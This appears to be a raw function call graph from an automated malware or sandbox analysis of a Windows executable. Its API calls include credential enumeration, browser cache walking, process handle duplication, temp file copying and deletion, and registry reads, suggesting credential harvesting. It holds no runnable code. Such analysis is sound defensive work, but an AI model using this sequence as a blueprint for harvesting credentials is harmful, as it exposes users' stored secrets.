38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b82 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402b99 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402bb0 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bc7 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bde 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402bf5 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402c0c 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c23 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c3a 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c51 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c68 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c7f 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402c99 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402cb3 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cd5 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402cf0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402d0b 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d26 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d3e 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d59 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d78 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402d93 38213->38214 38215 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38214->38215 38215->38097 38216->38087 38220 40b58d 38217->38220 38219 40b2d1 38219->38162 38221 40b5a4 GetModuleHandleW FindResourceW 38220->38221 38222 40b62e 38220->38222 38223 40b5c2 LoadResource 38221->38223 38225 40b5e7 38221->38225 38222->38219 38224 40b5d0 SizeofResource LockResource 38223->38224 38223->38225 38224->38225 38225->38222 38233 40afcf 38225->38233 38227 40b608 memcpy 38236 40b4d3 memcpy 38227->38236 38229 40b61e 38237 40b3c1 18 API calls 38229->38237 38231 40b626 38238 40b04b 38231->38238 38234 40b04b ??3@YAXPAX 38233->38234 38235 40afd7 ??2@YAPAXI 38234->38235 38235->38227 38236->38229 38237->38231 38239 40b051 ??3@YAXPAX 38238->38239 38240 40b05f 38238->38240 38239->38240 38240->38222 38241->38105 38243 444a64 FreeLibrary 38242->38243 38244 444a83 38242->38244 38243->38244 38244->38107 38246 4032c4 38245->38246 38247 40b633 free 38246->38247 38248 403316 38247->38248 38265 44553b 38248->38265 38252 403480 38463 40368c 15 API calls 38252->38463 38254 403489 38255 40b633 free 38254->38255 38257 403495 38255->38257 38256 40333c 38256->38252 38258 4033a9 memset memcpy 38256->38258 38259 4033ec wcscmp 38256->38259 38461 4028e7 11 API calls 38256->38461 38462 40f508 6 API calls 38256->38462 38257->38107 38258->38256 38258->38259 38259->38256 38262 403421 _wcsicmp 38262->38256 38263->38107 38264->38108 38266 445548 38265->38266 38267 445599 38266->38267 38464 40c768 38266->38464 38268 4455a8 memset 38267->38268 38275 4457f2 38267->38275 38547 403988 38268->38547 38278 445854 38275->38278 38649 403e2d memset memset memset memset memset 38275->38649 38276 4455e5 38287 445672 38276->38287 38292 44560f 38276->38292 38277 4458bb memset memset 38280 414c2e 17 API calls 38277->38280 38331 4458aa 38278->38331 38672 403c9c memset memset memset memset memset 38278->38672 38283 4458f9 38280->38283 38282 44595e memset memset 38290 414c2e 17 API calls 38282->38290 38291 40b2cc 27 API calls 38283->38291 38285 44558c 38531 444b06 38285->38531 38286 44557a 38286->38285 38745 4136c0 CoTaskMemFree 38286->38745 38558 403fbe memset memset memset memset memset 38287->38558 38288 445a00 memset memset 38695 414c2e 38288->38695 38289 445b22 38295 445bca 38289->38295 38296 445b38 memset memset memset 38289->38296 38300 44599c 38290->38300 38302 445909 38291->38302 38304 4087b3 338 API calls 38292->38304 38294 445849 38761 40b1ab free free 38294->38761 38303 445c8b memset memset 38295->38303 38369 445cf0 38295->38369 38307 445bd4 38296->38307 38308 445b98 38296->38308 38301 40b2cc 27 API calls 38300->38301 38315 4459ac 38301->38315 38312 409d1f 6 API calls 38302->38312 38316 414c2e 17 API calls 38303->38316 38313 445621 38304->38313 38305 44589f 38762 40b1ab free free 38305->38762 38306 445585 38746 41366b FreeLibrary 38306->38746 38322 414c2e 17 API calls 38307->38322 38308->38307 38318 445ba2 38308->38318 38311 403335 38460 4452e5 45 API calls 38311->38460 38326 445919 38312->38326 38747 4454bf 20 API calls 38313->38747 38314 445823 38314->38294 38336 4087b3 338 API calls 38314->38336 38327 409d1f 6 API calls 38315->38327 38328 445cc9 38316->38328 38834 4099c6 wcslen 38318->38834 38319 4456b2 38749 40b1ab free free 38319->38749 38321 40b2cc 27 API calls 38332 445a4f 38321->38332 38323 445be2 38322->38323 38334 40b2cc 27 API calls 38323->38334 38324 445d3d 38354 40b2cc 27 API calls 38324->38354 38325 445d88 memset memset memset 38337 414c2e 17 API calls 38325->38337 38763 409b98 GetFileAttributesW 38326->38763 38338 4459bc 38327->38338 38339 409d1f 6 API calls 38328->38339 38329 445879 38329->38305 38350 4087b3 338 API calls 38329->38350 38331->38277 38355 44594a 38331->38355 38711 409d1f wcslen wcslen 38332->38711 38344 445bf3 38334->38344 38336->38314 38347 445dde 38337->38347 38830 409b98 GetFileAttributesW 38338->38830 38349 445ce1 38339->38349 38340 445bb3 38837 445403 memset 38340->38837 38341 445680 38341->38319 38581 4087b3 memset 38341->38581 38353 409d1f 6 API calls 38344->38353 38345 445928 38345->38355 38764 40b6ef 38345->38764 38356 40b2cc 27 API calls 38347->38356 38854 409b98 GetFileAttributesW 38349->38854 38350->38329 38352 40b2cc 27 API calls 38361 445a94 38352->38361 38363 445c07 38353->38363 38364 445d54 _wcsicmp 38354->38364 38355->38282 38368 4459ed 38355->38368 38367 445def 38356->38367 38357 4459cb 38357->38368 38377 40b6ef 253 API calls 38357->38377 38716 40ae18 38361->38716 38362 44566d 38362->38275 38632 413d4c 38362->38632 38373 445389 259 API calls 38363->38373 38374 445d71 38364->38374 38437 445d67 38364->38437 38366 445665 38748 40b1ab free free 38366->38748 38375 409d1f 6 API calls 38367->38375 38368->38288 38368->38289 38369->38311 38369->38324 38369->38325 38370 445389 259 API calls 38370->38295 38379 445c17 38373->38379 38855 445093 23 API calls 38374->38855 38382 445e03 38375->38382 38377->38368 38378 4456d8 38384 40b2cc 27 API calls 38378->38384 38385 40b2cc 27 API calls 38379->38385 38381 44563c 38381->38366 38387 4087b3 338 API calls 38381->38387 38856 409b98 GetFileAttributesW 38382->38856 38383 40b6ef 253 API calls 38383->38311 38389 4456e2 38384->38389 38390 445c23 38385->38390 38386 445d83 38386->38311 38387->38381 38750 413fa6 _wcsicmp _wcsicmp 38389->38750 38394 409d1f 6 API calls 38390->38394 38392 445e12 38398 445e6b 38392->38398 38405 40b2cc 27 API calls 38392->38405 38396 445c37 38394->38396 38395 4456eb 38401 4456fd memset memset memset memset 38395->38401 38402 4457ea 38395->38402 38403 445389 259 API calls 38396->38403 38397 445b17 38831 40aebe 38397->38831 38858 445093 23 API calls 38398->38858 38751 409c70 wcscpy wcsrchr 38401->38751 38754 413d29 38402->38754 38408 445c47 38403->38408 38409 445e33 38405->38409 38406 445e7e 38411 445f67 38406->38411 38414 40b2cc 27 API calls 38408->38414 38415 409d1f 6 API calls 38409->38415 38420 40b2cc 27 API calls 38411->38420 38412 445ab2 memset 38416 40b2cc 27 API calls 38412->38416 38418 445c53 38414->38418 38419 445e47 38415->38419 38421 445aa1 38416->38421 38417 409c70 2 API calls 38422 44577e 38417->38422 38423 409d1f 6 API calls 38418->38423 38857 409b98 GetFileAttributesW 38419->38857 38425 445f73 38420->38425 38421->38397 38421->38412 38426 409d1f 6 API calls 38421->38426 38723 40add4 38421->38723 38728 445389 38421->38728 38737 40ae51 38421->38737 38427 409c70 2 API calls 38422->38427 38428 445c67 38423->38428 38430 409d1f 6 API calls 38425->38430 38426->38421 38431 44578d 38427->38431 38432 445389 259 API calls 38428->38432 38429 445e56 38429->38398 38435 445e83 memset 38429->38435 38433 445f87 38430->38433 38431->38402 38439 40b2cc 27 API calls 38431->38439 38432->38295 38861 409b98 GetFileAttributesW 38433->38861 38438 40b2cc 27 API calls 38435->38438 38437->38311 38437->38383 38440 445eab 38438->38440 38441 4457a8 38439->38441 38442 409d1f 6 API calls 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 445ebf 38442->38444 38445 4457b8 38443->38445 38446 40ae18 9 API calls 38444->38446 38753 409b98 GetFileAttributesW 38445->38753 38456 445ef5 38446->38456 38448 4457c7 38448->38402 38450 4087b3 338 API calls 38448->38450 38449 40ae51 9 API calls 38449->38456 38450->38402 38451 445f5c 38453 40aebe FindClose 38451->38453 38452 40add4 2 API calls 38452->38456 38453->38411 38454 40b2cc 27 API calls 38454->38456 38455 409d1f 6 API calls 38455->38456 38456->38449 38456->38451 38456->38452 38456->38454 38456->38455 38458 445f3a 38456->38458 38859 409b98 GetFileAttributesW 38456->38859 38860 445093 23 API calls 38458->38860 38460->38256 38461->38262 38462->38256 38463->38254 38465 40c775 38464->38465 38862 40b1ab free free 38465->38862 38467 40c788 38863 40b1ab free free 38467->38863 38469 40c790 38864 40b1ab free free 38469->38864 38471 40c798 38472 40aa04 free 38471->38472 38473 40c7a0 38472->38473 38865 40c274 memset 38473->38865 38478 40a8ab 9 API calls 38479 40c7c3 38478->38479 38480 40a8ab 9 API calls 38479->38480 38481 40c7d0 38480->38481 38894 40c3c3 38481->38894 38485 40c877 38494 40bdb0 38485->38494 38486 40c86c 38936 4053fe 39 API calls 38486->38936 38487 40c7e5 38487->38485 38487->38486 38493 40c634 50 API calls 38487->38493 38919 40a706 38487->38919 38493->38487 39199 404363 38494->39199 38497 40bf5d 39219 40440c 38497->39219 38498 40bdee 38498->38497 38502 40b2cc 27 API calls 38498->38502 38499 40bddf CredEnumerateW 38499->38498 38503 40be02 wcslen 38502->38503 38503->38497 38510 40be1e 38503->38510 38504 40be26 wcsncmp 38504->38510 38507 40be7d memset 38508 40bea7 memcpy 38507->38508 38507->38510 38509 40bf11 wcschr 38508->38509 38508->38510 38509->38510 38510->38497 38510->38504 38510->38507 38510->38508 38510->38509 38511 40b2cc 27 API calls 38510->38511 38513 40bf43 LocalFree 38510->38513 39222 40bd5d 28 API calls 38510->39222 39223 404423 38510->39223 38512 40bef6 _wcsnicmp 38511->38512 38512->38509 38512->38510 38513->38510 38514 4135f7 39238 4135e0 38514->39238 38517 40b2cc 27 API calls 38518 41360d 38517->38518 38519 40a804 8 API calls 38518->38519 38520 413613 38519->38520 38521 41361b 38520->38521 38522 41363e 38520->38522 38523 40b273 27 API calls 38521->38523 38524 4135e0 FreeLibrary 38522->38524 38525 413625 GetProcAddress 38523->38525 38526 413643 38524->38526 38525->38522 38527 413648 38525->38527 38526->38286 38528 413658 38527->38528 38529 4135e0 FreeLibrary 38527->38529 38528->38286 38530 413666 38529->38530 38530->38286 39241 4449b9 38531->39241 38534 444c1f 38534->38267 38535 4449b9 42 API calls 38537 444b4b 38535->38537 38536 444c15 38539 4449b9 42 API calls 38536->38539 38537->38536 39262 444972 GetVersionExW 38537->39262 38539->38534 38540 444b99 memcmp 38545 444b8c 38540->38545 38541 444c0b 39266 444a85 42 API calls 38541->39266 38545->38540 38545->38541 39263 444aa5 42 API calls 38545->39263 39264 40a7a0 GetVersionExW 38545->39264 39265 444a85 42 API calls 38545->39265 38548 40399d 38547->38548 39267 403a16 38548->39267 38550 403a09 39281 40b1ab free free 38550->39281 38552 403a12 wcsrchr 38552->38276 38553 4039a3 38553->38550 38556 4039f4 38553->38556 39278 40a02c CreateFileW 38553->39278 38556->38550 38557 4099c6 2 API calls 38556->38557 38557->38550 38559 414c2e 17 API calls 38558->38559 38560 404048 38559->38560 38561 414c2e 17 API calls 38560->38561 38562 404056 38561->38562 38563 409d1f 6 API calls 38562->38563 38564 404073 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 40408e 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 4040a6 38567->38568 38569 403af5 20 API calls 38568->38569 38570 4040ba 38569->38570 38571 403af5 20 API calls 38570->38571 38572 4040cb 38571->38572 39308 40414f memset 38572->39308 38574 404140 39322 40b1ab free free 38574->39322 38575 4040ec memset 38579 4040e0 38575->38579 38577 404148 38577->38341 38578 4099c6 2 API calls 38578->38579 38579->38574 38579->38575 38579->38578 38580 40a8ab 9 API calls 38579->38580 38580->38579 39335 40a6e6 WideCharToMultiByte 38581->39335 38583 4087ed 39336 4095d9 memset 38583->39336 38586 408809 memset memset memset memset memset 38587 40b2cc 27 API calls 38586->38587 38588 4088a1 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 4088b1 38589->38590 38591 40b2cc 27 API calls 38590->38591 38592 4088c0 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4088d0 38593->38594 38595 40b2cc 27 API calls 38594->38595 38596 4088df 38595->38596 38597 409d1f 6 API calls 38596->38597 38598 4088ef 38597->38598 38599 40b2cc 27 API calls 38598->38599 38600 4088fe 38599->38600 38601 409d1f 6 API calls 38600->38601 38602 40890e 38601->38602 38603 40b2cc 27 API calls 38602->38603 38604 40891d 38603->38604 38605 409d1f 6 API calls 38604->38605 38606 40892d 38605->38606 39355 409b98 GetFileAttributesW 38606->39355 38613 408953 38613->38341 38633 40b633 free 38632->38633 38634 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38633->38634 38635 413f00 Process32NextW 38634->38635 38636 413da5 OpenProcess 38635->38636 38637 413f17 CloseHandle 38635->38637 38638 413eb0 38636->38638 38639 413df3 memset 38636->38639 38637->38378 38638->38635 38641 413ebf free 38638->38641 38642 4099f4 3 API calls 38638->38642 39779 413f27 38639->39779 38641->38638 38642->38638 38643 413e1f 38644 413e37 GetModuleHandleW 38643->38644 39784 413959 38643->39784 39800 413ca4 38643->39800 38644->38643 38646 413e46 GetProcAddress 38644->38646 38646->38643 38648 413ea2 CloseHandle 38648->38638 38650 414c2e 17 API calls 38649->38650 38651 403eb7 38650->38651 38652 414c2e 17 API calls 38651->38652 38653 403ec5 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 403ee2 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 403efd 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 403f15 38658->38659 38660 403af5 20 API calls 38659->38660 38661 403f29 38660->38661 38662 403af5 20 API calls 38661->38662 38663 403f3a 38662->38663 38664 40414f 33 API calls 38663->38664 38670 403f4f 38664->38670 38665 403faf 39814 40b1ab free free 38665->39814 38667 403f5b memset 38667->38670 38668 403fb7 38668->38314 38669 4099c6 2 API calls 38669->38670 38670->38665 38670->38667 38670->38669 38671 40a8ab 9 API calls 38670->38671 38671->38670 38673 414c2e 17 API calls 38672->38673 38674 403d26 38673->38674 38675 414c2e 17 API calls 38674->38675 38676 403d34 38675->38676 38677 409d1f 6 API calls 38676->38677 38678 403d51 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 403d6c 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403d84 38681->38682 38683 403af5 20 API calls 38682->38683 38684 403d98 38683->38684 38685 403af5 20 API calls 38684->38685 38686 403da9 38685->38686 38687 40414f 33 API calls 38686->38687 38688 403dbe 38687->38688 38689 403e1e 38688->38689 38691 403dca memset 38688->38691 38693 4099c6 2 API calls 38688->38693 38694 40a8ab 9 API calls 38688->38694 39815 40b1ab free free 38689->39815 38691->38688 38692 403e26 38692->38329 38693->38688 38694->38688 38696 414b81 9 API calls 38695->38696 38698 414c40 38696->38698 38697 414c73 memset 38700 414c94 38697->38700 38698->38697 39816 409cea 38698->39816 39819 414592 RegOpenKeyExW 38700->39819 38703 414c64 SHGetSpecialFolderPathW 38705 414d0b 38703->38705 38704 414cc1 38706 414cf4 wcscpy 38704->38706 39820 414bb0 wcscpy 38704->39820 38705->38321 38706->38705 38708 414cd2 39821 4145ac RegQueryValueExW 38708->39821 38710 414ce9 RegCloseKey 38710->38706 38712 409d62 38711->38712 38713 409d43 wcscpy 38711->38713 38712->38352 38714 409719 2 API calls 38713->38714 38715 409d51 wcscat 38714->38715 38715->38712 38717 40aebe FindClose 38716->38717 38718 40ae21 38717->38718 38719 4099c6 2 API calls 38718->38719 38720 40ae35 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 40ae49 38721->38722 38722->38421 38724 40ade0 38723->38724 38727 40ae0f 38723->38727 38725 40ade7 wcscmp 38724->38725 38724->38727 38726 40adfe wcscmp 38725->38726 38725->38727 38726->38727 38727->38421 38729 40ae18 9 API calls 38728->38729 38734 4453c4 38729->38734 38730 40ae51 9 API calls 38730->38734 38731 4453f3 38733 40aebe FindClose 38731->38733 38732 40add4 2 API calls 38732->38734 38735 4453fe 38733->38735 38734->38730 38734->38731 38734->38732 38736 445403 254 API calls 38734->38736 38735->38421 38736->38734 38738 40ae7b FindNextFileW 38737->38738 38739 40ae5c FindFirstFileW 38737->38739 38740 40ae94 38738->38740 38741 40ae8f 38738->38741 38739->38740 38743 40aeb6 38740->38743 38744 409d1f 6 API calls 38740->38744 38742 40aebe FindClose 38741->38742 38742->38740 38743->38421 38744->38743 38745->38306 38746->38285 38747->38381 38748->38362 38749->38362 38750->38395 38752 409c89 38751->38752 38752->38417 38753->38448 38755 413d39 38754->38755 38756 413d2f FreeLibrary 38754->38756 38757 40b633 free 38755->38757 38756->38755 38758 413d42 38757->38758 38759 40b633 free 38758->38759 38760 413d4a 38759->38760 38760->38275 38761->38278 38762->38331 38763->38345 38765 44db70 38764->38765 38766 40b6fc memset 38765->38766 38767 409c70 2 API calls 38766->38767 38768 40b732 wcsrchr 38767->38768 38769 40b743 38768->38769 38770 40b746 memset 38768->38770 38769->38770 38771 40b2cc 27 API calls 38770->38771 38772 40b76f 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 40b783 38773->38774 39822 409b98 GetFileAttributesW 38774->39822 38776 40b792 38777 40b7c2 38776->38777 38778 409c70 2 API calls 38776->38778 39823 40bb98 38777->39823 38780 40b7a5 38778->38780 38782 40b2cc 27 API calls 38780->38782 38786 40b7b2 38782->38786 38783 40b837 CloseHandle 38785 40b83e memset 38783->38785 38784 40b817 38787 409a45 3 API calls 38784->38787 39856 40a6e6 WideCharToMultiByte 38785->39856 38789 409d1f 6 API calls 38786->38789 38790 40b827 CopyFileW 38787->38790 38789->38777 38790->38785 38791 40b866 38792 444432 121 API calls 38791->38792 38794 40b879 38792->38794 38793 40bad5 38796 40baeb 38793->38796 38797 40bade DeleteFileW 38793->38797 38794->38793 38795 40b273 27 API calls 38794->38795 38798 40b89a 38795->38798 38799 40b04b ??3@YAXPAX 38796->38799 38797->38796 38800 438552 134 API calls 38798->38800 38801 40baf3 38799->38801 38802 40b8a4 38800->38802 38801->38355 38803 40bacd 38802->38803 38805 4251c4 137 API calls 38802->38805 38804 443d90 111 API calls 38803->38804 38804->38793 38828 40b8b8 38805->38828 38806 40bac6 39866 424f26 123 API calls 38806->39866 38807 40b8bd memset 39857 425413 17 API calls 38807->39857 38810 425413 17 API calls 38810->38828 38813 40a71b MultiByteToWideChar 38813->38828 38814 40a734 MultiByteToWideChar 38814->38828 38817 40b9b5 memcmp 38817->38828 38818 4099c6 2 API calls 38818->38828 38819 404423 38 API calls 38819->38828 38822 40bb3e memset memcpy 39867 40a734 MultiByteToWideChar 38822->39867 38823 4251c4 137 API calls 38823->38828 38825 40bb88 LocalFree 38825->38828 38828->38806 38828->38807 38828->38810 38828->38813 38828->38814 38828->38817 38828->38818 38828->38819 38828->38822 38828->38823 38829 40ba5f memcmp 38828->38829 39858 4253ef 16 API calls 38828->39858 39859 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38828->39859 39860 4253af 17 API calls 38828->39860 39861 4253cf 17 API calls 38828->39861 39862 447280 memset 38828->39862 39863 447960 memset memcpy memcpy memcpy 38828->39863 39864 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38828->39864 39865 447920 memcpy memcpy memcpy 38828->39865 38829->38828 38830->38357 38832 40aed1 38831->38832 38833 40aec7 FindClose 38831->38833 38832->38289 38833->38832 38835 4099d7 38834->38835 38836 4099da memcpy 38834->38836 38835->38836 38836->38340 38838 40b2cc 27 API calls 38837->38838 38839 44543f 38838->38839 38840 409d1f 6 API calls 38839->38840 38841 44544f 38840->38841 39951 409b98 GetFileAttributesW 38841->39951 38843 44545e 38844 445476 38843->38844 38845 40b6ef 253 API calls 38843->38845 38846 40b2cc 27 API calls 38844->38846 38845->38844 38847 445482 38846->38847 38848 409d1f 6 API calls 38847->38848 38849 445492 38848->38849 39952 409b98 GetFileAttributesW 38849->39952 38851 4454a1 38852 4454b9 38851->38852 38853 40b6ef 253 API calls 38851->38853 38852->38370 38853->38852 38854->38369 38855->38386 38856->38392 38857->38429 38858->38406 38859->38456 38860->38456 38861->38437 38862->38467 38863->38469 38864->38471 38866 414c2e 17 API calls 38865->38866 38867 40c2ae 38866->38867 38937 40c1d3 38867->38937 38872 40c3be 38889 40a8ab 38872->38889 38873 40afcf 2 API calls 38874 40c2fd FindFirstUrlCacheEntryW 38873->38874 38875 40c3b6 38874->38875 38876 40c31e wcschr 38874->38876 38877 40b04b ??3@YAXPAX 38875->38877 38878 40c331 38876->38878 38879 40c35e FindNextUrlCacheEntryW 38876->38879 38877->38872 38881 40a8ab 9 API calls 38878->38881 38879->38876 38880 40c373 GetLastError 38879->38880 38882 40c3ad FindCloseUrlCache 38880->38882 38883 40c37e 38880->38883 38884 40c33e wcschr 38881->38884 38882->38875 38885 40afcf 2 API calls 38883->38885 38884->38879 38886 40c34f 38884->38886 38887 40c391 FindNextUrlCacheEntryW 38885->38887 38888 40a8ab 9 API calls 38886->38888 38887->38876 38887->38882 38888->38879 39126 40a97a 38889->39126 38892 40a8cc 38892->38478 38893 40a8d0 7 API calls 38893->38892 39131 40b1ab free free 38894->39131 38896 40c3dd 38897 40b2cc 27 API calls 38896->38897 38898 40c3e7 38897->38898 39132 414592 RegOpenKeyExW 38898->39132 38900 40c3f4 38901 40c50e 38900->38901 38902 40c3ff 38900->38902 38916 405337 38901->38916 38903 40a9ce 4 API calls 38902->38903 38904 40c418 memset 38903->38904 39133 40aa1d 38904->39133 38907 40c471 38909 40c47a _wcsupr 38907->38909 38908 40c505 RegCloseKey 38908->38901 38910 40a8d0 7 API calls 38909->38910 38911 40c498 38910->38911 38912 40a8d0 7 API calls 38911->38912 38913 40c4ac memset 38912->38913 38914 40aa1d 38913->38914 38915 40c4e4 RegEnumValueW 38914->38915 38915->38908 38915->38909 39135 405220 38916->39135 38920 4099c6 2 API calls 38919->38920 38921 40a714 _wcslwr 38920->38921 38922 40c634 38921->38922 39192 405361 38922->39192 38925 40c65c wcslen 39195 4053b6 39 API calls 38925->39195 38926 40c71d wcslen 38926->38487 38928 40c677 38929 40c713 38928->38929 39196 40538b 39 API calls 38928->39196 39198 4053df 39 API calls 38929->39198 38932 40c6a5 38932->38929 38933 40c6a9 memset 38932->38933 38934 40c6d3 38933->38934 39197 40c589 44 API calls 38934->39197 38936->38485 38938 40ae18 9 API calls 38937->38938 38944 40c210 38938->38944 38939 40ae51 9 API calls 38939->38944 38940 40c264 38941 40aebe FindClose 38940->38941 38943 40c26f 38941->38943 38942 40add4 2 API calls 38942->38944 38949 40e5ed memset memset 38943->38949 38944->38939 38944->38940 38944->38942 38945 40c231 _wcsicmp 38944->38945 38946 40c1d3 35 API calls 38944->38946 38945->38944 38947 40c248 38945->38947 38946->38944 38962 40c084 22 API calls 38947->38962 38950 414c2e 17 API calls 38949->38950 38951 40e63f 38950->38951 38952 409d1f 6 API calls 38951->38952 38953 40e658 38952->38953 38963 409b98 GetFileAttributesW 38953->38963 38955 40e667 38956 40e680 38955->38956 38957 409d1f 6 API calls 38955->38957 38964 409b98 GetFileAttributesW 38956->38964 38957->38956 38959 40e68f 38960 40c2d8 38959->38960 38965 40e4b2 38959->38965 38960->38872 38960->38873 38962->38944 38963->38955 38964->38959 38986 40e01e 38965->38986 38967 40e593 38968 40e5b0 38967->38968 38969 40e59c DeleteFileW 38967->38969 38970 40b04b ??3@YAXPAX 38968->38970 38969->38968 38972 40e5bb 38970->38972 38971 40e521 38971->38967 39009 40e175 38971->39009 38974 40e5c4 CloseHandle 38972->38974 38975 40e5cc 38972->38975 38974->38975 38977 40b633 free 38975->38977 38976 40e573 38978 40e584 38976->38978 38979 40e57c CloseHandle 38976->38979 38980 40e5db 38977->38980 39052 40b1ab free free 38978->39052 38979->38978 38982 40b633 free 38980->38982 38983 40e5e3 38982->38983 38983->38960 38985 40e540 38985->38976 39029 40e2ab 38985->39029 39053 406214 38986->39053 38989 40e16b 38989->38971 38992 40afcf 2 API calls 38993 40e08d OpenProcess 38992->38993 38994 40e0a4 GetCurrentProcess DuplicateHandle 38993->38994 38998 40e152 38993->38998 38995 40e0d0 GetFileSize 38994->38995 38996 40e14a CloseHandle 38994->38996 39089 409a45 GetTempPathW 38995->39089 38996->38998 38997 40e160 39001 40b04b ??3@YAXPAX 38997->39001 38998->38997 39000 406214 22 API calls 38998->39000 39000->38997 39001->38989 39002 40e0ea 39092 4096dc CreateFileW 39002->39092 39004 40e0f1 CreateFileMappingW 39005 40e140 CloseHandle CloseHandle 39004->39005 39006 40e10b MapViewOfFile 39004->39006 39005->38996 39007 40e13b CloseHandle 39006->39007 39008 40e11f WriteFile UnmapViewOfFile 39006->39008 39007->39005 39008->39007 39010 40e18c 39009->39010 39093 406b90 39010->39093 39013 40e1a7 memset 39019 40e1e8 39013->39019 39014 40e299 39103 4069a3 39014->39103 39020 40e283 39019->39020 39021 40dd50 _wcsicmp 39019->39021 39027 40e244 _snwprintf 39019->39027 39110 406e8f 13 API calls 39019->39110 39111 40742e 8 API calls 39019->39111 39112 40aae3 wcslen wcslen _memicmp 39019->39112 39113 406b53 SetFilePointerEx ReadFile 39019->39113 39022 40e291 39020->39022 39023 40e288 free 39020->39023 39021->39019 39024 40aa04 free 39022->39024 39023->39022 39024->39014 39028 40a8d0 7 API calls 39027->39028 39028->39019 39030 40e2c2 39029->39030 39031 406b90 11 API calls 39030->39031 39032 40e2d3 39031->39032 39033 40e4a0 39032->39033 39038 40e489 39032->39038 39041 40dd50 _wcsicmp 39032->39041 39047 40e3e0 memcpy 39032->39047 39048 40e3fb memcpy 39032->39048 39049 40e3b3 wcschr 39032->39049 39050 40e416 memcpy 39032->39050 39051 40e431 memcpy 39032->39051 39114 406e8f 13 API calls 39032->39114 39115 40dd50 _wcsicmp 39032->39115 39124 40742e 8 API calls 39032->39124 39125 406b53 SetFilePointerEx ReadFile 39032->39125 39034 4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38985 39039 40aa04 free 39038->39039 39040 40e491 39039->39040 39040->39033 39042 40e497 free 39040->39042 39041->39032 39042->39033 39044 40e376 memset 39116 40aa29 39044->39116 39047->39032 39048->39032 39049->39032 39050->39032 39051->39032 39052->38967 39054 406294 CloseHandle 39053->39054 39055 406224 39054->39055 39056 4096c3 CreateFileW 39055->39056 39058 40622d 39056->39058 39057 406281 GetLastError 39059 40625a 39057->39059 39058->39057 39060 40a2ef ReadFile 39058->39060 39059->38989 39064 40dd85 memset 39059->39064 39061 406244 39060->39061 39061->39057 39062 40624b 39061->39062 39062->39059 39063 406777 19 API calls 39062->39063 39063->39059 39065 409bca GetModuleFileNameW 39064->39065 39066 40ddbe CreateFileW 39065->39066 39069 40ddf1 39066->39069 39067 40afcf ??2@YAPAXI ??3@YAXPAX 39067->39069 39068 41352f 9 API calls 39068->39069 39069->39067 39069->39068 39070 40de0b NtQuerySystemInformation 39069->39070 39071 40de3b CloseHandle GetCurrentProcessId 39069->39071 39070->39069 39072 40de54 39071->39072 39073 413d4c 46 API calls 39072->39073 39081 40de88 39073->39081 39074 40e00c 39075 413d29 free FreeLibrary 39074->39075 39076 40e014 39075->39076 39076->38989 39076->38992 39077 40dea9 _wcsicmp 39078 40dee7 OpenProcess 39077->39078 39079 40debd _wcsicmp 39077->39079 39078->39081 39079->39078 39080 40ded0 _wcsicmp 39079->39080 39080->39078 39080->39081 39081->39074 39081->39077 39082 40dfef CloseHandle 39081->39082 39083 40df78 39081->39083 39084 40df23 GetCurrentProcess DuplicateHandle 39081->39084 39087 40df8f CloseHandle 39081->39087 39082->39081 39083->39082 39083->39087 39088 40dfae _wcsicmp 39083->39088 39084->39081 39085 40df4c memset 39084->39085 39086 41352f 9 API calls 39085->39086 39086->39081 39087->39083 39088->39081 39088->39083 39090 409a74 GetTempFileNameW 39089->39090 39091 409a66 GetWindowsDirectoryW 39089->39091 39090->39002 39091->39090 39092->39004 39094 406bd5 39093->39094 39095 406bad 39093->39095 39097 4066bf free malloc memcpy free free 39094->39097 39102 406c0f 39094->39102 39095->39094 39096 406bba _wcsicmp 39095->39096 39096->39094 39096->39095 39098 406be5 39097->39098 39099 40afcf ??2@YAPAXI ??3@YAXPAX 39098->39099 39098->39102 39100 406bff 39099->39100 39101 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39100->39101 39101->39102 39102->39013 39102->39014 39104 4069c4 ??3@YAXPAX 39103->39104 39105 4069af 39104->39105 39106 40b633 free 39105->39106 39107 4069ba 39106->39107 39108 40b04b ??3@YAXPAX 39107->39108 39109 4069c2 39108->39109 39109->38985 39110->39019 39111->39019 39112->39019 39113->39019 39114->39032 39115->39044 39117 40aa33 39116->39117 39118 40aa63 39116->39118 39119 40aa44 39117->39119 39120 40aa38 wcslen 39117->39120 39118->39032 39121 40a9ce malloc memcpy free free 39119->39121 39120->39119 39122 40aa4d 39121->39122 39122->39118 